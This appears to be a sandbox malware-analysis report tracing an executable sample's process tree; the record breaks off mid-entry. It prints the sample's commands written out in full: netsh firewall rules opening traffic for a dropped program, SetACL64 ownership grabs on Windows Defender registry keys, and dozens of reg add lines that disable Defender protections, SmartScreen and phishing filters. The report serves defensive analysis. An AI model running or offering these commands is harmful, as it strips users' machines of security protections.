Token: SeAssignPrimaryTokenPrivilege	2172	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2172	PowerRun64.exe
Token: 0	2172	PowerRun64.exe
Token: SeDebugPrivilege	2136	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2136	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2136	PowerRun64.exe
Token: SeDebugPrivilege	2952	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2952	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2952	PowerRun64.exe
Token: 0	2952	PowerRun64.exe
Token: SeDebugPrivilege	2376	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2376	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2376	PowerRun64.exe
Token: SeDebugPrivilege	2664	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2664	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2664	PowerRun64.exe
Token: 0	2664	PowerRun64.exe
Token: SeDebugPrivilege	2772	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2772	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2772	PowerRun64.exe
Token: SeDebugPrivilege	912	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	912	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	912	PowerRun64.exe
Token: 0	912	PowerRun64.exe
Token: SeDebugPrivilege	108	PowerRun64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1980 wrote to memory of 2956	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	31
PID 1980 wrote to memory of 2956	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	31
PID 1980 wrote to memory of 2956	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	31
PID 1980 wrote to memory of 2956	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	31
PID 1980 wrote to memory of 2716	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	33
PID 1980 wrote to memory of 2716	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	33
PID 1980 wrote to memory of 2716	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	33
PID 1980 wrote to memory of 2716	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	33
PID 1980 wrote to memory of 2636	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	35
PID 1980 wrote to memory of 2636	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	35
PID 1980 wrote to memory of 2636	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	35
PID 1980 wrote to memory of 2636	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	35
PID 1980 wrote to memory of 2636	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	35
PID 1980 wrote to memory of 2636	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	35
PID 1980 wrote to memory of 2636	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	35
PID 2636 wrote to memory of 1640	2636	dotNetFx40_Full_setup.exe	36
PID 2636 wrote to memory of 1640	2636	dotNetFx40_Full_setup.exe	36
PID 2636 wrote to memory of 1640	2636	dotNetFx40_Full_setup.exe	36
PID 2636 wrote to memory of 1640	2636	dotNetFx40_Full_setup.exe	36
PID 2636 wrote to memory of 1640	2636	dotNetFx40_Full_setup.exe	36
PID 2636 wrote to memory of 1640	2636	dotNetFx40_Full_setup.exe	36
PID 2636 wrote to memory of 1640	2636	dotNetFx40_Full_setup.exe	36
PID 1980 wrote to memory of 2092	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	37
PID 1980 wrote to memory of 2092	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	37
PID 1980 wrote to memory of 2092	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	37
PID 1980 wrote to memory of 2092	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	37
PID 1980 wrote to memory of 2092	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	37
PID 1980 wrote to memory of 2092	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	37
PID 1980 wrote to memory of 2092	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	37
PID 2092 wrote to memory of 1996	2092	dotNetFx45_Full_setup.exe	38
PID 2092 wrote to memory of 1996	2092	dotNetFx45_Full_setup.exe	38
PID 2092 wrote to memory of 1996	2092	dotNetFx45_Full_setup.exe	38
PID 2092 wrote to memory of 1996	2092	dotNetFx45_Full_setup.exe	38
PID 2092 wrote to memory of 1996	2092	dotNetFx45_Full_setup.exe	38
PID 2092 wrote to memory of 1996	2092	dotNetFx45_Full_setup.exe	38
PID 2092 wrote to memory of 1996	2092	dotNetFx45_Full_setup.exe	38
PID 1980 wrote to memory of 2952	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	39
PID 1980 wrote to memory of 2952	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	39
PID 1980 wrote to memory of 2952	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	39
PID 1980 wrote to memory of 2952	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	39
PID 2952 wrote to memory of 3000	2952	cmd.exe	41
PID 2952 wrote to memory of 3000	2952	cmd.exe	41
PID 2952 wrote to memory of 3000	2952	cmd.exe	41
PID 2952 wrote to memory of 3000	2952	cmd.exe	41
PID 1980 wrote to memory of 2772	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	42
PID 1980 wrote to memory of 2772	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	42
PID 1980 wrote to memory of 2772	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	42
PID 1980 wrote to memory of 2772	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	42
PID 2772 wrote to memory of 2800	2772	cmd.exe	44
PID 2772 wrote to memory of 2800	2772	cmd.exe	44
PID 2772 wrote to memory of 2800	2772	cmd.exe	44
PID 2772 wrote to memory of 2800	2772	cmd.exe	44
PID 2772 wrote to memory of 2732	2772	cmd.exe	45
PID 2772 wrote to memory of 2732	2772	cmd.exe	45
PID 2772 wrote to memory of 2732	2772	cmd.exe	45
PID 2772 wrote to memory of 2732	2772	cmd.exe	45
PID 2772 wrote to memory of 2684	2772	cmd.exe	46
PID 2772 wrote to memory of 2684	2772	cmd.exe	46
PID 2772 wrote to memory of 2684	2772	cmd.exe	46
PID 2772 wrote to memory of 2684	2772	cmd.exe	46
PID 2772 wrote to memory of 2756	2772	cmd.exe	47
PID 2772 wrote to memory of 2756	2772	cmd.exe	47
PID 2772 wrote to memory of 2756	2772	cmd.exe	47
PID 2772 wrote to memory of 2756	2772	cmd.exe	47

C:\Users\Admin\AppData\Local\Temp\13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
"C:\Users\Admin\AppData\Local\Temp\13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1980
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=acxxtzcogvgr dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\acxxtzcogvgr.exe" enable=yes profile=public,private
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2956
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=acxxtzcogvgr dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\acxxtzcogvgr.exe" enable=yes profile=public,private
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2716
- C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\dotNetFx40_Full_setup.exe
  "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\dotNetFx40_Full_setup.exe" /q /norestart
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2636
- - C:\5df86802b777e4fae4ebd05a60fa\Setup.exe
    C:\5df86802b777e4fae4ebd05a60fa\\Setup.exe /q /norestart /x86 /x64 /ia64 /web
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1640
- C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\dotNetFx45_Full_setup.exe
  "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\dotNetFx45_Full_setup.exe" /q /norestart
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2092
- - C:\5b4d3321377963819dc253cb\Setup.exe
    C:\5b4d3321377963819dc253cb\\Setup.exe /q /norestart /x86 /x64 /web
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\bn.bat
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2952
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\bnz.bat
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2800
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
    3⤵
    - Executes dropped EXE
    - Windows security modification
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
    3⤵
    - Executes dropped EXE
    - Windows security modification
    - Suspicious use of AdjustPrivilegeToken
    PID:3064
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
    3⤵
    - Executes dropped EXE
    - Windows security modification
    - Suspicious use of AdjustPrivilegeToken
    PID:2752
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
    3⤵
    - Executes dropped EXE
    - Windows security modification
    - Suspicious use of AdjustPrivilegeToken
    PID:2796
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2668
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2644
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2864
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2704
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
    3⤵
    PID:2348
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2580
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2532
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2528
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2548
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2604
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\bnn.bat
  2⤵
  PID:2436
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
    3⤵
    PID:480
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1448
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1700
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1872
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\bnoo1.bat
  2⤵
  PID:1736
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1460
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
    3⤵
    PID:2332
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1912
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:764
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1424
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1880
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1020
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:1412
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1624
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:1868
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:1008
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:1232
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:1592
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1160
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1760
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:336
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\bn1.bat
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1864
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2004
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2876
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2844
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2416
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2384
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2880
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2872
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:832
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2936
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2216
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
    3⤵
    PID:412
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2032
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2716
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2676
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2400
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2424
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1560
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1740
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
    3⤵
    PID:952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1556
- - C:\Windows\SysWOW64\reg.exe
